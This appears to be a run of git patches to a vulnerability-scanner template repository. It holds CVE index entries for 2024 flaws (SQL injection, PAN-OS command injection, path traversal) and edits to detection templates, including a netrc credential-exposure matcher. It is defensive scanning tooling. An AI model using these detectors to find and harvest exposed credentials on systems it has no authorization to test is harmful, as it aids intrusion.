{"ID":"CVE-2024-33288","Info":{"Name":"Prison Management System - SQL Injection Authentication Bypass","Severity":"high","Description":"Sql injection vulnerability was found on the login page in Prison Management System\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33288.yaml"} {"ID":"CVE-2024-33575","Info":{"Name":"User Meta WP Plugin \u003c 3.1 - Sensitive Information Exposure","Severity":"medium","Description":"The User Meta is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0 via the /views/debug.php file. This makes it possible for unauthenticated attackers, with to extract sensitive configuration data.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-33575.yaml"} {"ID":"CVE-2024-33724","Info":{"Name":"SOPlanning 1.52.00 Cross Site Scripting","Severity":"medium","Description":"SOPlanning v1.52.00 is vulnerable to XSS via the 'groupe_id' parameters a remote unautheticated attacker can hijack the admin account or other users. The remote attacker can hijack a users session or credentials and perform a takeover of the entire platform.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33724.yaml"} {"ID":"CVE-2024-3400","Info":{"Name":"GlobalProtect - OS Command Injection","Severity":"critical","Description":"A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-3400.yaml"} {"ID":"CVE-2024-34470","Info":{"Name":"HSC Mailinspector 5.2.17-3 through 5.2.18 - Local File Inclusion","Severity":"high","Description":"An Unauthenticated Path Traversal vulnerability exists in the /public/loaderphp file The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-34470.yaml"} {"ID":"CVE-2024-3495","Info":{"Name":"Wordpress Country State City Dropdown \u003c=2.7.2 - SQL Injection","Severity":"critical","Description":"The Country State City Dropdown CF7 plugin for WordPress is vulnerable to SQL Injection via the ‘cnt’ and 'sid' parameters in versions up to, and including, 2.7.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3495.yaml"} +{"ID":"CVE-2024-3822","Info":{"Name":"Base64 Encoder/Decoder \u003c= 0.9.2 - Cross-Site Scripting","Severity":"medium","Description":"The Base64 Encoder/Decoder WordPress plugin through 0.9.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2024/CVE-2024-3822.yaml"} {"ID":"CVE-2024-4040","Info":{"Name":"CrushFTP VFS - Sandbox Escape LFR","Severity":"critical","Description":"VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-4040.yaml"} {"ID":"CVE-2024-4348","Info":{"Name":"osCommerce v4.0 - Cross-site Scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in osCommerce 4. Affected is an unknown function of the file /catalog/all-products. The manipulation of the argument cat leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-4348.yaml"} {"ID":"CVE-2024-4956","Info":{"Name":"Sonatype Nexus Repository Manager 3 - Local File Inclusion","Severity":"high","Description":"Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-4956.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index f700702c1e..1f5792643e 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -452c7c1312faac212368ec04f7467cdf +0cf7a96430fadd9e4602ab1fd647e275 From 368d4737d0fd869e93c79c18a923c4ae9e95d410 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sat, 1 Jun 2024 19:11:04 +0530 Subject: [PATCH 570/847] Fix FN matcher --- http/miscellaneous/directory-listing.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/miscellaneous/directory-listing.yaml b/http/miscellaneous/directory-listing.yaml index 9e73bb7eaa..f3c9456350 100644 --- a/http/miscellaneous/directory-listing.yaml +++ b/http/miscellaneous/directory-listing.yaml @@ -88,6 +88,7 @@ http: part: body words: - "<title>Index of" + case-insensitive: true - type: word part: header From c2ff5fec11af54c6c4ebde2411614438fd36ed8d Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Sat, 1 Jun 2024 13:55:07 +0000 Subject: [PATCH 571/847] Auto Generated New Template Addition List [Sat Jun 1 13:55:06 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 634104ea53..aa01809e8a 100644 --- a/.new-additions +++ b/.new-additions @@ -21,6 +21,7 @@ http/exposed-panels/oracle-access-management.yaml http/exposed-panels/vrealize-hyperic-login-panel.yaml http/exposures/tokens/wechat/wechat-secret-key.yaml http/iot/netgear-boarddataww-rce.yaml +http/miscellaneous/directory-listing.yaml http/misconfiguration/installer/activecollab-installer.yaml http/misconfiguration/installer/call-com-installer.yaml http/misconfiguration/installer/cms-made-simple-installer.yaml From 6cd9c1c19e063227bffa46c65866facd65b278fd Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sat, 1 Jun 2024 13:55:11 +0000 Subject: [PATCH 572/847] Auto Generated Templates Checksum [Sat Jun 1 13:55:11 UTC 2024] :robot: --- templates-checksum.txt | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 22cfdb7e6a..9d447b0ee8 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -187,8 +187,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:dd91b67f940e974898b092d7ec70b30823618862 -cves.json-checksum.txt:228ead1221696fbf9e065eae8380c2f221438495 +cves.json:f096845ddb0fa602cfb3fc900f94a098c42ea15b +cves.json-checksum.txt:022276eb87f506fd930108e9e921ca6765d0b969 dast/cves/2018/CVE-2018-19518.yaml:06ecee25413d9f238e2ae0138b4775f0243e8d22 dast/cves/2021/CVE-2021-45046.yaml:d470397419ae4ef5db02b0a833013fe295576396 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -5190,6 +5190,7 @@ http/miscellaneous/defaced-website-detect.yaml:045ede38b93611039e21dc0f249ddebf3 http/miscellaneous/defacement-detect.yaml:0636060c6c434c29a127d7cac1a29f86167d420e http/miscellaneous/detect-dns-over-https.yaml:46b316a9632c17d9cf75cbb27de9c706c9a14b0b http/miscellaneous/dir-listing.yaml:dad3bf5aa871745ab62bf6f4b61909bde637e326 +http/miscellaneous/directory-listing.yaml:611a87661f4ef2defbe6d1318fea08f5aadbbaa2 http/miscellaneous/email-extractor.yaml:5815f093718b70c0b64c4c423cd1ec8ab94f1281 http/miscellaneous/exposed-file-upload-form.yaml:64f23d5b8da7c59b3ec10f035ffe433f26f8d62d http/miscellaneous/external-service-interaction.yaml:55a5e41982df451d077107874414eca191585ba2 @@ -7899,7 +7900,7 @@ http/vulnerabilities/other/opencti-lfi.yaml:4436182554e2970f2129db430e2fede74a1a http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml:4fb8f1900823a5ac074fca0719184c2727b46c37 http/vulnerabilities/other/openshift-log4j-rce.yaml:9981be094dfeb786c2526d931ebee412690d2b6b http/vulnerabilities/other/opensis-lfi.yaml:c1f5b90b135d401109243e355fc7a2eb6597a0a7 -http/vulnerabilities/other/opensns-rce.yaml:bb8e06d5e9d8cdd153b473fd8c28aeca186958b2 +http/vulnerabilities/other/opensns-rce.yaml:16b8ea34f4fd61b24f94d7876216ba84e14d258b http/vulnerabilities/other/openvpn-hhi.yaml:3fcb3e167c4c7671807948d7d5268e6dd821f93c http/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml:58f9b71232e69f91b9ea83abdcb79394c40ae2f6 http/vulnerabilities/other/oracle-fatwire-lfi.yaml:ddecec2e84838ce0db6d8038c370dc2559c0eb62 @@ -8614,7 +8615,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:40337c1eafe1c0e548003abfa4adba4c37c3ea8a +templates-checksum.txt:e7be0b2490cc07b41cb051bc0f30f7643dd56496 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 39c9df64601798e29013f4700dce7f6d1690227d Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Sat, 1 Jun 2024 13:55:46 +0000 Subject: [PATCH 573/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index ba624c0b34..9bc4be6741 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -26,6 +26,7 @@ on: - 'http/exposed-panels/vrealize-hyperic-login-panel.yaml' - 'http/exposures/tokens/wechat/wechat-secret-key.yaml' - 'http/iot/netgear-boarddataww-rce.yaml' + - 'http/miscellaneous/directory-listing.yaml' - 'http/misconfiguration/installer/activecollab-installer.yaml' - 'http/misconfiguration/installer/call-com-installer.yaml' - 'http/misconfiguration/installer/cms-made-simple-installer.yaml' From 8117d4754fb8fcdb176d960f6bd66c8c352494d4 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sat, 1 Jun 2024 13:57:15 +0000 Subject: [PATCH 574/847] Auto Template Signing [Sat Jun 1 13:57:15 UTC 2024] :robot: --- http/miscellaneous/directory-listing.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/miscellaneous/directory-listing.yaml b/http/miscellaneous/directory-listing.yaml index f3c9456350..e2671e4087 100644 --- a/http/miscellaneous/directory-listing.yaml +++ b/http/miscellaneous/directory-listing.yaml @@ -98,3 +98,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022006c9e4c21e613f0959523ff2e65fb401d4e44713841407994f00dbf4d517236e022100a4ecfb02a7da96f4c074b1f3a89e6a6524e5fd1dc9228276c7de764ee93ee538:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 2d875681b918311f9e619c3cdf113d5aeeeaf91d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Sat, 1 Jun 2024 23:14:36 +0530 Subject: [PATCH 575/847] Fix FP netrc --- http/exposures/configs/netrc.yaml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/http/exposures/configs/netrc.yaml b/http/exposures/configs/netrc.yaml index f0052fddb8..19e7455e75 100644 --- a/http/exposures/configs/netrc.yaml +++ b/http/exposures/configs/netrc.yaml @@ -33,6 +33,12 @@ http: - "password " condition: and + - type: word + part: header + words: + - "text/html" + negative: true + extractors: - type: regex part: body From 52f56115b1491c8585868df564f0626436aa923e Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Sat, 1 Jun 2024 23:53:49 +0530 Subject: [PATCH 576/847] minor - update --- .../{bitvise-detect.yaml => bitvise-ssh-detect.yaml} | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) rename network/detection/{bitvise-detect.yaml => bitvise-ssh-detect.yaml} (76%) diff --git a/network/detection/bitvise-detect.yaml b/network/detection/bitvise-ssh-detect.yaml similarity index 76% rename from network/detection/bitvise-detect.yaml rename to network/detection/bitvise-ssh-detect.yaml index 59125af37c..7ea2c93b37 100644 --- a/network/detection/bitvise-detect.yaml +++ b/network/detection/bitvise-ssh-detect.yaml @@ -1,15 +1,14 @@ id: bitvise-detect info: - name: Bitvise Service - Detect + name: SSH Bitvise Service - Detect author: abdullahisik severity: info description: | - Bitvise service was detected. + Bitvise SSH service was detected. reference: - https://www.bitvise.com/ - https://vulners.com/openvas/OPENVAS:1361412562310813387 - classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 @@ -17,7 +16,7 @@ info: metadata: shodan-query: product:"bitvise" max-request: 1 - tags: seclists,network,ssh,bitvise,detect + tags: network,ssh,bitvise,detect tcp: - host: @@ -32,4 +31,4 @@ tcp: extractors: - type: regex regex: - - "SSH-([0-9.]+)-([0-9.]+) .*" + - "SSH([-0-9.]+) FlowSsh: Bitvise ([A-Z a-z()]+) ([0-9.]+)" \ No newline at end of file From b550ed41de9fd0ee36152246634842c37cd5a937 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Sat, 1 Jun 2024 18:57:51 +0000 Subject: [PATCH 577/847] Auto Generated New Template Addition List [Sat Jun 1 18:57:51 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index aa01809e8a..ff42203707 100644 --- a/.new-additions +++ b/.new-additions @@ -55,3 +55,4 @@ http/technologies/gabia-server-detect.yaml http/technologies/gotweb-detect.yaml http/vulnerabilities/other/array-vpn-lfi.yaml http/vulnerabilities/other/cerio-dt-rce.yaml +network/detection/bitvise-ssh-detect.yaml From bf41c87cd2743a3874ccd83189877afc4a93802e Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sat, 1 Jun 2024 18:57:57 +0000 Subject: [PATCH 578/847] Auto Generated Templates Checksum [Sat Jun 1 18:57:57 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 9d447b0ee8..5a562e23b6 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5190,7 +5190,7 @@ http/miscellaneous/defaced-website-detect.yaml:045ede38b93611039e21dc0f249ddebf3 http/miscellaneous/defacement-detect.yaml:0636060c6c434c29a127d7cac1a29f86167d420e http/miscellaneous/detect-dns-over-https.yaml:46b316a9632c17d9cf75cbb27de9c706c9a14b0b http/miscellaneous/dir-listing.yaml:dad3bf5aa871745ab62bf6f4b61909bde637e326 -http/miscellaneous/directory-listing.yaml:611a87661f4ef2defbe6d1318fea08f5aadbbaa2 +http/miscellaneous/directory-listing.yaml:3d81594572d543440ffe225bf2d06df42c7e214f http/miscellaneous/email-extractor.yaml:5815f093718b70c0b64c4c423cd1ec8ab94f1281 http/miscellaneous/exposed-file-upload-form.yaml:64f23d5b8da7c59b3ec10f035ffe433f26f8d62d http/miscellaneous/external-service-interaction.yaml:55a5e41982df451d077107874414eca191585ba2 @@ -8466,6 +8466,7 @@ network/detection/apache-activemq-detect.yaml:afd8fba85587220ae91e9120c3f7455529 network/detection/aws-sftp-detect.yaml:4c67b37ede734d66486377b851223abb638d1f78 network/detection/axigen-mail-server-detect.yaml:fbf92b3b9d61df5aaf614b98b570149d62bd96ef network/detection/bgp-detect.yaml:53fc7559679a89a8db2bfb0b44c771fff916d006 +network/detection/bitvise-ssh-detect.yaml:14a18e7829239564ff2fac0ce4cb9ffdc359efd5 network/detection/bluecoat-telnet-proxy-detect.yaml:f7509936000eeac439add7b118ee52ac3c0f8725 network/detection/cisco-finger-detect.yaml:12c8c9b4e0504539a5280517e2a0a0039cd9f588 network/detection/clamav-detect.yaml:34ee606515af2f8ab375ce4f602ca5942f8b20a3 @@ -8615,7 +8616,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:e7be0b2490cc07b41cb051bc0f30f7643dd56496 +templates-checksum.txt:7b86a5977d267c7708d57cdc968ddbbbbcec9a6f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From f395be6922dd1b2f5af5880f3aa4b7be24c07191 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Sat, 1 Jun 2024 18:58:43 +0000 Subject: [PATCH 579/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 9bc4be6741..41c3f1fada 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -60,6 +60,7 @@ on: - 'http/technologies/gotweb-detect.yaml' - 'http/vulnerabilities/other/array-vpn-lfi.yaml' - 'http/vulnerabilities/other/cerio-dt-rce.yaml' + - 'network/detection/bitvise-ssh-detect.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From f2fdb881ce93dedbe029fa99a6a3c66447054c7c Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sat, 1 Jun 2024 18:59:44 +0000 Subject: [PATCH 580/847] Auto Template Signing [Sat Jun 1 18:59:44 UTC 2024] :robot: --- network/detection/bitvise-ssh-detect.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/network/detection/bitvise-ssh-detect.yaml b/network/detection/bitvise-ssh-detect.yaml index 7ea2c93b37..5b50595cd9 100644 --- a/network/detection/bitvise-ssh-detect.yaml +++ b/network/detection/bitvise-ssh-detect.yaml @@ -31,4 +31,5 @@ tcp: extractors: - type: regex regex: - - "SSH([-0-9.]+) FlowSsh: Bitvise ([A-Z a-z()]+) ([0-9.]+)" \ No newline at end of file + - "SSH([-0-9.]+) FlowSsh: Bitvise ([A-Z a-z()]+) ([0-9.]+)" +# digest: 490a004630440220010abebfd25e29ee77729c67afbab686ff917aed4effa46d5492ba335f0fd58f022021dbdbe86bb9e0f8eed16cb0eafcd7fc2ec05c4be7565d78b90baba7f82af79c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From c7d74856677414c29d650e2d503a7e2f7c32b43c Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sat, 1 Jun 2024 19:24:11 +0000 Subject: [PATCH 582/847] Auto Generated Templates Checksum [Sat Jun 1 19:24:11 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 5a562e23b6..4f11fac764 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4714,7 +4714,7 @@ http/exposures/configs/mercurial-hgignore.yaml:e0ff7b4ae41b060b9ddf3ebfed79d2ccb http/exposures/configs/msmtp-config.yaml:c2fe9549d0d0a774612ce7931ee2084a1970c22b http/exposures/configs/nagios-status-page.yaml:657a6f17b303ee8cbb7c3bf51e8fcfbda15101ef http/exposures/configs/netbeans-config.yaml:30c6fc7151841e7effbf1934ecbb3c90b00a47c2 -http/exposures/configs/netrc.yaml:d5243667429965f770b9ad42bb192987bfafa2ba +http/exposures/configs/netrc.yaml:9c3ba171cb5c80b97f38554e6c1840134502c95c http/exposures/configs/nginx-config.yaml:0ed1f3adfa9b5d7b9005d62932cad2b7578f507d http/exposures/configs/opcache-status-exposure.yaml:91cda46fc73949560bf976b71adf8e023d79f188 http/exposures/configs/oracle-cgi-printenv.yaml:de7fe5d906926db35687bd8b5503e35d72c1003f @@ -8466,7 +8466,7 @@ network/detection/apache-activemq-detect.yaml:afd8fba85587220ae91e9120c3f7455529 network/detection/aws-sftp-detect.yaml:4c67b37ede734d66486377b851223abb638d1f78 network/detection/axigen-mail-server-detect.yaml:fbf92b3b9d61df5aaf614b98b570149d62bd96ef network/detection/bgp-detect.yaml:53fc7559679a89a8db2bfb0b44c771fff916d006 -network/detection/bitvise-ssh-detect.yaml:14a18e7829239564ff2fac0ce4cb9ffdc359efd5 +network/detection/bitvise-ssh-detect.yaml:2e69f94f964c1861b3c2c8dd4a155e52c36927cd network/detection/bluecoat-telnet-proxy-detect.yaml:f7509936000eeac439add7b118ee52ac3c0f8725 network/detection/cisco-finger-detect.yaml:12c8c9b4e0504539a5280517e2a0a0039cd9f588 network/detection/clamav-detect.yaml:34ee606515af2f8ab375ce4f602ca5942f8b20a3 @@ -8616,7 +8616,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:7b86a5977d267c7708d57cdc968ddbbbbcec9a6f +templates-checksum.txt:8c017f5288707b4e96f39b7690d1fdb6aad5ddb3 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From e7b61d6662072382eb1e3f2ef6be0576973e2bbf Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sat, 1 Jun 2024 19:25:57 +0000 Subject: [PATCH 583/847] Auto Template Signing [Sat Jun 1 19:25:56 UTC 2024] :robot: --- http/exposures/configs/netrc.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/exposures/configs/netrc.yaml b/http/exposures/configs/netrc.yaml index 19e7455e75..46b9a81020 100644 --- a/http/exposures/configs/netrc.yaml +++ b/http/exposures/configs/netrc.yaml @@ -44,5 +44,4 @@ http: part: body regex: - "machine [0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?(?:\\.[0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?)*\\.?" - -# digest: 490a00463044022072f3810d5161d773a7e963bf1431f25dc27b0af216a44b5d3ebc90f6bbc4b9f402207701413414bce54d3da7716463e173f5192dfe85efd4dcaa10f91901a398163e:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100fc3cfa897f3091b3b22fcd0a21ef630ce805b7ef2536295c7029282a2332a5c90221008a14f754783d6f04703bc7d904376759a6de0a9ba3704440ede2d505096cc0bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 1aa2382eb15892f640604c95dbc7b3f685c3fe90 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 2 Jun 2024 11:25:21 +0530 Subject: [PATCH 584/847] Update and rename cowboy-detect.yaml to http/technologies/cowboy-detect.yaml --- cowboy-detect.yaml => http/technologies/cowboy-detect.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) rename cowboy-detect.yaml => http/technologies/cowboy-detect.yaml (80%) diff --git a/cowboy-detect.yaml b/http/technologies/cowboy-detect.yaml similarity index 80% rename from cowboy-detect.yaml rename to http/technologies/cowboy-detect.yaml index 53a56edff0..2eff270b16 100644 --- a/cowboy-detect.yaml +++ b/http/technologies/cowboy-detect.yaml @@ -8,6 +8,7 @@ info: reference: - https://github.com/ninenines/cowboy metadata: + max-request: 1 verified: true shodan-query: "cowboy" tags: tech,cowboy,detect @@ -15,11 +16,11 @@ info: requests: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" - matchers-condition: and matchers: - type: word + part: header words: - "Server: Cowboy" - part: hea \ No newline at end of file + case-insensitive: true From 54d0eb2d550c01002ab556a20bff017821168f9c Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Sun, 2 Jun 2024 06:13:13 +0000 Subject: [PATCH 585/847] Auto Generated New Template Addition List [Sun Jun 2 06:13:13 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index ff42203707..df882b48cf 100644 --- a/.new-additions +++ b/.new-additions @@ -51,6 +51,7 @@ http/misconfiguration/installer/ubersmith-installer.yaml http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml http/misconfiguration/installer/virtual-smartzone-installer.yaml http/misconfiguration/installer/wowonder-installer.yaml +http/technologies/cowboy-detect.yaml http/technologies/gabia-server-detect.yaml http/technologies/gotweb-detect.yaml http/vulnerabilities/other/array-vpn-lfi.yaml From a32b037288b348c6d0b4d60b4e301f5c2a190265 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 2 Jun 2024 06:13:29 +0000 Subject: [PATCH 586/847] Auto Generated Templates Checksum [Sun Jun 2 06:13:29 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 4f11fac764..ddd2776b49 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4714,7 +4714,7 @@ http/exposures/configs/mercurial-hgignore.yaml:e0ff7b4ae41b060b9ddf3ebfed79d2ccb http/exposures/configs/msmtp-config.yaml:c2fe9549d0d0a774612ce7931ee2084a1970c22b http/exposures/configs/nagios-status-page.yaml:657a6f17b303ee8cbb7c3bf51e8fcfbda15101ef http/exposures/configs/netbeans-config.yaml:30c6fc7151841e7effbf1934ecbb3c90b00a47c2 -http/exposures/configs/netrc.yaml:9c3ba171cb5c80b97f38554e6c1840134502c95c +http/exposures/configs/netrc.yaml:c59cb2322fce014ee30bd8446fab2815f0de548f http/exposures/configs/nginx-config.yaml:0ed1f3adfa9b5d7b9005d62932cad2b7578f507d http/exposures/configs/opcache-status-exposure.yaml:91cda46fc73949560bf976b71adf8e023d79f188 http/exposures/configs/oracle-cgi-printenv.yaml:de7fe5d906926db35687bd8b5503e35d72c1003f @@ -6726,6 +6726,7 @@ http/technologies/coming-soon-page-detect.yaml:11bc0a870298c1a1cf414f677762ccba0 http/technologies/confluence-detect.yaml:a04bc71e42d461e8530902a2a69ae0f187506ff6 http/technologies/connectwise-control-detect.yaml:35b690093c8b71aa317417cd82264891dcbe277e http/technologies/couchbase-sync-gateway.yaml:f2ca1759ea3106b3f21b839b70fc52a23b67fcc3 +http/technologies/cowboy-detect.yaml:c35c9dffcc604d9cea63db82ff86acaf1646b8c0 http/technologies/craft-cms-detect.yaml:b0c7e4f8f830ab3e2f599ee62975557f48a21559 http/technologies/craftercms-detect.yaml:0239600f4a3b22dc74157fc4035819d87936fa74 http/technologies/csrfguard-detect.yaml:7a0e3757762d2336706a42a0e0218391624b96a6 @@ -8616,7 +8617,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:8c017f5288707b4e96f39b7690d1fdb6aad5ddb3 +templates-checksum.txt:2570a9df52702c19d290a325cc50de8ab1f69b8a wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From a2f506bb56a2253ee0f9315b9089b755859ec7f4 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Sun, 2 Jun 2024 06:14:01 +0000 Subject: [PATCH 587/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 41c3f1fada..5881440d8e 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -56,6 +56,7 @@ on: - 'http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml' - 'http/misconfiguration/installer/virtual-smartzone-installer.yaml' - 'http/misconfiguration/installer/wowonder-installer.yaml' + - 'http/technologies/cowboy-detect.yaml' - 'http/technologies/gabia-server-detect.yaml' - 'http/technologies/gotweb-detect.yaml' - 'http/vulnerabilities/other/array-vpn-lfi.yaml' From 902d692314f17d2e717211121f2c67db9aab3368 